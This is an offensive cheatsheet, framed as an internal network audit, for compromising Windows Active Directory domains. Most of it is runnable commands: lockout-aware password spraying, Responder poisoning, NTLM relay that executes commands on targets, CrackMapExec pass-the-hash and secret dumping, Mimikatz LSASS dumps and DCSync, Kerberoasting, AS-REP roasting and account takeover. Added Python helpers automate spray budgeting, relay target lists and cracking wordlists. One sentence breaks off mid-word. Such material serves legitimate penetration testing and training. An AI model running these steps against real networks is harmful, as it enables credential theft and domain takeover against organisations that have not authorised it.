

---
title: Internal Network Audit
categories: [cheatsheets]
tags: [windows, security, network, AD]
---

Internal Network Audit


Low Hanging Fruits

AD Enumeration

  • Get the domain password policy (lockout threshold and observation window decide how aggressively you may spray)

    net accounts /domain
    
  • Use PowerView's Get-DomainUser to list domain users together with their attributes

  • Get account names and descriptions (the description field sometimes holds passwords or other useful hints)

    Get-DomainUser | Select-Object -Property samaccountname,description
    
  • Get accounts sorted by pwdLastSet (very old values point to stale or never-rotated passwords, very recent ones to passwords that were just set)

    Get-DomainUser -Properties samaccountname,pwdLastSet | where {$_.samaccountname -ne 'DefaultAccount' -AND $_.samaccountname -ne 'Guest'} | sort pwdLastSet | ft -wrap -autosize
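
The lockout settings in the `net accounts /domain` output decide how many guesses per account a password spray may make before real users get locked out. The following is an added example (my code, not part of the cheatsheet): a parser for that output and a lockout-safe spray budget derived from it. The sample output is constructed, and the two-attempt safety margin is my own convention.

```python
# Added example (not from the cheatsheet): parse `net accounts /domain` output
# and derive a lockout-safe password-spray budget from it.
# The output below is constructed for the example, not captured from a real domain.

SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Keys are the labels `net accounts` prints; values are the names used below.
FIELDS = {
    "Lockout threshold": "lockout_threshold",
    "Lockout duration (minutes)": "lockout_duration",
    "Lockout observation window (minutes)": "lockout_window",
    "Minimum password length": "min_length",
    "Maximum password age (days)": "max_age",
    "Length of password history maintained": "history",
}


def parse_net_accounts(text):
    """Return the policy as ints; 'Never' / 'Unlimited' become None (no limit)."""
    policy = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        label, value = (part.strip() for part in line.split(":", 1))
        if label not in FIELDS:
            continue
        policy[FIELDS[label]] = int(value) if value.isdigit() else None
    return policy


def spray_budget(policy, safety_margin=2):
    """How many guesses per user fit in one observation window without locking anyone out.

    `safety_margin` (my convention, not something the tool prints) leaves room for
    the user's own typos and for earlier failed attempts you cannot see.
    """
    threshold = policy.get("lockout_threshold")
    if threshold is None:            # 'Never' -> account lockout is disabled
        return {"attempts_per_window": None, "wait_minutes": 0, "lockout_enabled": False}
    attempts = max(threshold - safety_margin, 1)
    window = policy.get("lockout_window") or 0
    return {
        "attempts_per_window": attempts,
        "wait_minutes": window,      # pause this long before the next round of guesses
        "lockout_enabled": True,
    }


if __name__ == "__main__":
    pol = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    print(pol)
    print(spray_budget(pol))
```

With the constructed policy (threshold 5, window 30 minutes) the budget is three guesses per account, then a 30 minute pause. A threshold of "Never" means lockout is disabled and spraying is limited only by detection, not by the policy.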
    

Password Spraying via Kerberos

Bloodhound

  • BloodHound ingestors (collectors) gather domain data (users, groups, computers, ACLs, trusts, sessions, local admins) from the DC via LDAP and from member hosts via SMB/RPC
  • Ingestors:
    • PowerShell (SharpHound.ps1, the original ingestor)
    • Python (pip install bloodhound; provides bloodhound-python)
    • C# (SharpHound.exe)
  • They can be run from domain-joined and non-domain-joined computers (the Python ingestor needs valid domain credentials and working name resolution for the domain).

  • With the python ingestor

    # Domain-joined host with working DNS (default collection; -c All also gathers ACLs and object properties)
    bloodhound-python -u user@DOMAIN -p PASSWORD
    
    # Non-domain-joined host or DNS trouble: name the domain, DC and GC explicitly
    # (if the DC name itself does not resolve, point name resolution at the DC with -ns <dc-ip>)
    bloodhound-python -u user@DOMAIN -p PASSWORD -d DOMAIN -dc DC1.DOMAIN.COM -gc DC1.DOMAIN.COM
    
  • SharpHound

    # collect everything: LDAP data plus sessions and local group memberships from every host
    SharpHound.exe -c All
    # loop session collection against every computer for 24h (older SharpHound syntax; current builds use --loop with --loopduration)
    SharpHound.exe -c SessionLoop --MaxLoopTime 24h
    

Local AD Accounts

  • Check whether any local Windows service runs under a domain account
  • Open Services (services.msc) and sort by "Log On As"
  • -> Find domain accounts
  • The service's password is stored as an LSA secret, so Mimikatz recovers it in cleartext (lsadump::secrets, or sekurlsa::logonpasswords while the service is running)

Responder - Attacks against the NTLM authentication protocol

  • https://github.com/lgandx/Responder
  • Responder poisons LLMNR, NBT-NS and mDNS name requests on the local segment, so the victim authenticates to the attacker and leaks a NetNTLM(v1/v2) challenge-response
  • NetNTLMv2 responses can be cracked offline (hashcat -m 5600), but slowly, so this only pays off against weak passwords; unlike NT hashes they cannot be used for pass-the-hash
  • NTLM relaying (see below)

    sh> python Responder.py -I eth0
    # which rogue servers Responder runs is configured in Responder.conf next to the script
    # -A (analyze mode) only logs requests without answering them: a quiet first check during an audit
    
  • What triggers LLMNR, NetBIOS and WPAD broadcasts?

    • A name that DNS cannot resolve (mistyped hostnames, stale shortcuts or mapped drives); WPAD via LLMNR/NetBIOS no longer works on patched Windows and in modern browsers
    • DNS records that unprivileged users create: by default any authenticated domain user may add records to AD-integrated DNS zones, so unresolved names can be pointed at the attacker
    • Windows prefers IPv6 over IPv4 and requests IPv6 configuration via DHCPv6 even on IPv4-only networks; answering those requests makes the attacker the DNS server (tool: mitm6)

mitm6

DC Sync

  • Requires replication rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All); Domain Admins, Enterprise Admins and DCs hold them by default, and GenericAll on the domain object implies them
  • Mimikatz performs the attack by asking the DC to replicate the way another DC would (lsadump::dcsync /domain:<domain> /all /csv)
  • -> This yields the NTLM hash (and Kerberos keys) of every account without touching the DC's LSASS or NTDS.dit
  • -> The krbtgt hash can be used to forge golden tickets

Attacking SMB

  • Tool: CrackMapExec https://github.com/byt3bl33d3r/CrackMapExec
  • Detailed Wiki Page:
  • -p <password> can be replaced with -H <hash> for pass-the-hash
  • CME prints (Pwn3d!) when the user is a local administrator on the host (i.e. has write access to ADMIN$)
  • Scan a range and write the hosts where SMB signing is not required (relay targets) to targets.txt; in the output below only SERVER1 and WIN10DESK1 (signing:False) qualify, the DCs enforce signing

    sh> cme smb <cidr> --gen-relay-list targets.txt
    
    SMB         192.168.1.101    445    DC2012A          [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
    SMB         192.168.1.102    445    DC2012B          [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
    SMB         192.168.1.111    445    SERVER1          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
    SMB         192.168.1.117    445    WIN10DESK1       [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
    
  • Enumerating all shares (and the permissions on them) with the given credentials

    sh> cme smb ips.txt -u <user> -p <pass> --shares
    
  • Code execution (needs local admin, i.e. Pwn3d!); -x runs the command through cmd.exe, -X through PowerShell

    sh> cme smb ips.txt -u <user> -p <pass> -x 'whoami'
    sh> cme smb ips.txt -u <user> -p <pass> -X 'whoami'
    
  • Dumping secrets (needs local admin): --sam dumps the local account hashes, --lsa the LSA secrets (cached domain credentials, service account passwords)

    sh> cme smb ips.txt -u <user> -p <pass> --sam
    sh> cme smb ips.txt -u <user> -p <pass> --lsa
    

Mimikatz

  • Dump credentials from LSASS (needs local admin; privilege::debug enables SeDebugPrivilege)

    mimikatz "privilege::debug" "sekurlsa::logonpasswords"
    
  • DCSync (requires replication rights on the domain, e.g. Domain Admin or GenericAll on the domain object)

    lsadump::dcsync /domain:<domain> /all /csv
    

Tips: GenericAll over a user object

  • Ways to take over the account without resetting its password (a reset is noisy and locks the real user out):
    • Logon script: set scriptPath so your code runs at the user's next logon
    • Targeted Kerberoasting: add an SPN to the user, request a ticket for it, crack it offline, remove the SPN again
    • Targeted AS-REP roast: set DONT_REQ_PREAUTH on the account, roast it, then clear the flag again
    • Password reset plus DCSync/DCShadow: save the old hash via DCSync, reset the password, use the account, then write the old hash back with DCShadow (needs DA-level rights)

More Advanced Attacks

Kerberoasting

Background (Kerberos TGT and TGS)

  1. An attacker authenticates to the domain and gets a ticket-granting ticket (TGT) from the domain controller; the TGT is used for all later ticket requests.
  2. The attacker uses the TGT to send a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form service/host, e.g. MSSqlSvc/SQL.domain.com. An SPN must be unique in the domain and is registered in the servicePrincipalName attribute of a user or computer account. In the request the attacker states which Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc.).
  3. If the TGT is valid, the DC copies the client information from the TGT into a service ticket, looks up which account has the requested SPN registered, and encrypts the ticket with that account's long-term key, using the strongest encryption type both the requester and the service account support. For RC4_HMAC that key is simply the account's NT hash. The ticket is returned in the service ticket reply (TGS-REP).
  4. The attacker extracts the encrypted service ticket from the TGS-REP. Because it is encrypted with a key derived only from the service account's password, the blob can be cracked offline to recover the plaintext password. Asking for RC4 (etype 23) keeps cracking fast; computer accounts are not worth targeting because their passwords are long and random.

Attack

There are three common approaches:

1) From a domain-joined Windows host:

  • Get all possible SPN's with PowerViews Get-DomainUser function:

    PS> Get-DomainUser -SPN
    
  • For each SPN, request a ticket with PowerShell and extract it from memory with Mimikatz:

    PS C:\> Add-Type -AssemblyName System.IdentityModel
    PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
    PS C:\> klist
    <tickets>
    
  • Extract with Mimikatz:

    mimikatz # kerberos::list /export
    

2) Using Impacket's own Kerberos implementation (from any host that can reach the DC; no Windows box needed)

Impacket's GetUserSPNs.py queries LDAP for user accounts with an SPN, requests the tickets and prints them in hashcat/John format:

sh> GetUserSPNs.py -request -dc-ip <domain-controller-ip> <domain/user>

3) PowerView's Invoke-Kerberoast

This module automates the whole process from a domain-joined host and outputs the hashes in John the Ripper or hashcat format:

PS> Invoke-Kerberoast -OutputFormat Hashcat

The hashes can then be cracked with John the Ripper, hashcat, or tgsrepcrack.

If the tickets were exported with Mimikatz, the '*.kirbi' files can be converted to John/hashcat compatible hashes with kirbi2john.

  • With John:

    sh> john --format=krb5tgs hashes.txt
    
  • With hashcat (13100 is the RC4/etype 23 format; AES tickets need 19600/19700 and crack far slower)

    sh> hashcat -m 13100 -a 0 hashes.txt /path/to/wordlist.txt
    


AS-REP Roast

If a user account has the DONT_REQ_PREAUTH flag set in userAccountControl, i.e. Kerberos pre-authentication is not required, anyone can send an AS-REQ for that user without knowing its password. The AS-REP contains a part encrypted with the user's key (derived from the password; for RC4 it is the NT hash), which can be brute-forced offline (hashcat -m 18200). Impacket's GetNPUsers.py requests and formats these replies.

To find such accounts with PowerView:

PS> Get-DomainUser -PreauthNotRequired


NTLM relaying attack

  • Relaying only works against hosts that do not require SMB signing; the relayed session runs with the victim's privileges, and ntlmrelayx dumps the target's SAM by default when that user is a local admin there
  • Create a list of potential targets (hosts with signing disabled) with CrackMapExec

    sh> cme smb computers.txt --gen-relay-list targets.txt
    
  • Start Responder with its HTTP and SMB servers turned off (set SMB = Off and HTTP = Off in Responder.conf) so that ntlmrelayx can bind those ports:

    sh> python Responder.py -I <interface> -r -d -w
    
  • Start NTLM relaying with ntlmrelayx.py using the targets from above (-smb2support is needed for targets that only speak SMB2/3):

    sh> ntlmrelayx.py -tf targets.txt -smb2support
    
  • This can also be used to execute a command on each target (e.g. an Empire launcher):

    sh> ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
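
The target list that ntlmrelayx consumes here is exactly what `--gen-relay-list` derives from the scan output shown in the Attacking SMB section above (hosts with `signing:False`). As an added example (my code, not CrackMapExec's or the cheatsheet's), the following rebuilds that list from the same output by hand and also records the per-domain findings an auditor reports next to it; the host names and addresses come from the sample output above and are not real.

```python
# Added example (not from the cheatsheet): build the ntlmrelayx target list from
# CrackMapExec scan output by hand, i.e. what --gen-relay-list does, plus the
# checks an auditor records alongside it. The sample lines are the ones shown in the
# Attacking SMB section; hostnames and addresses there are not real.
import re

CME_OUTPUT = """\
SMB         192.168.1.101    445    DC2012A          [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
SMB         192.168.1.102    445    DC2012B          [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
SMB         192.168.1.111    445    SERVER1          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
SMB         192.168.1.117    445    WIN10DESK1       [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
"""

LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)\s*"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+\(signing:(?P<signing>True|False)\)"
    r"(?:\s+\(SMBv1:(?P<smbv1>True|False)\))?"
)


def parse_cme(text):
    """One dict per host line; lines that do not match (errors, banners) are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["signing"] = d["signing"] == "True"
        d["smbv1"] = d["smbv1"] == "True"
        hosts.append(d)
    return hosts


def relay_targets(hosts):
    """IPs without SMB signing, one per line as --gen-relay-list writes them.
    Relaying to a host that requires signing fails, so the DCs (signing:True) are dropped."""
    return [h["ip"] for h in hosts if not h["signing"]]


def findings(hosts):
    """Per-domain summary for the report: signing not required, SMBv1 still enabled."""
    out = {}
    for h in hosts:
        entry = out.setdefault(h["domain"], {"no_signing": [], "smbv1": []})
        if not h["signing"]:
            entry["no_signing"].append(h["name"])
        if h["smbv1"]:
            entry["smbv1"].append(h["name"])
    return out


if __name__ == "__main__":
    hosts = parse_cme(CME_OUTPUT)
    print("\n".join(relay_targets(hosts)))   # the contents of targets.txt
    print(findings(hosts))
```

Writing the output of `relay_targets` to a file gives the same `targets.txt` that `cme smb <cidr> --gen-relay-list targets.txt` produces; the `findings` summary is the part the scan output alone does not give you (every host here still has SMBv1 on, which is a separate finding from the missing signing).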
    

Password Cracking

Rule:

Save the first name, last name and full name of every user account (and the same with the first letter capitalized, e.g. via sed) and use that as the wordlist. Then run hashcat in hybrid mode (-a 6) with this wordlist, a custom charset of !@$#% (--custom-charset1) and brute wit>
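
As an added example (my code, not from the cheatsheet) of the rule above: build the name-based wordlist from a user list and assemble the hashcat hybrid command. The user entries are constructed, and the mask `?1?d?d` (one symbol from the custom charset plus two digits) is my own choice, since the page does not state which mask it uses.

```python
# Added example (not from the cheatsheet): build the name-based wordlist the rule
# above describes and assemble the hashcat hybrid command. The user list is
# constructed; the mask is my choice, since the page does not state one.

# As PowerView's Get-DomainUser would return them (samaccountname, displayname); constructed.
USERS = [
    ("jsmith", "John Smith"),
    ("m.mueller", "Maria Müller"),
    ("svc_sql", "SQL Service"),
]


def name_candidates(users):
    """Account name, first, last and full name plus the joined forms, each in
    lower-case and with a capital first letter; sorted and de-duplicated."""
    words = set()
    for sam, display in users:
        parts = display.split()
        first = parts[0]
        last = parts[-1] if len(parts) > 1 else ""
        raw = [sam, first, last, first + last, display.replace(" ", "")]
        if last:
            raw.append(last + first)
        for w in raw:
            if not w:
                continue
            # capitalize() lowercases the rest ("Johnsmith"); the third form keeps inner capitals ("JohnSmith")
            words.update((w.lower(), w.capitalize(), w[0].upper() + w[1:]))
    return sorted(words)


def hashcat_hybrid_cmd(hash_mode, hash_file, wordlist_file, mask="?1?d?d", charset="!@$#%"):
    """hashcat -a 6 appends the mask to every word, so word + symbol + two digits
    covers patterns like Smith!19. Returned as argv, which avoids shell quoting of $."""
    return ["hashcat", "-m", str(hash_mode), "-a", "6",
            "--custom-charset1", charset, hash_file, wordlist_file, mask]


if __name__ == "__main__":
    words = name_candidates(USERS)
    print("\n".join(words))                      # write this to names.txt
    print(" ".join(hashcat_hybrid_cmd(13100, "hashes.txt", "names.txt")))
```

The command is built as an argument list on purpose: `$` inside the charset and `?` in the mask are shell metacharacters, so a pasted one-liner needs single quotes around both, while `subprocess.run(argv)` needs none.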
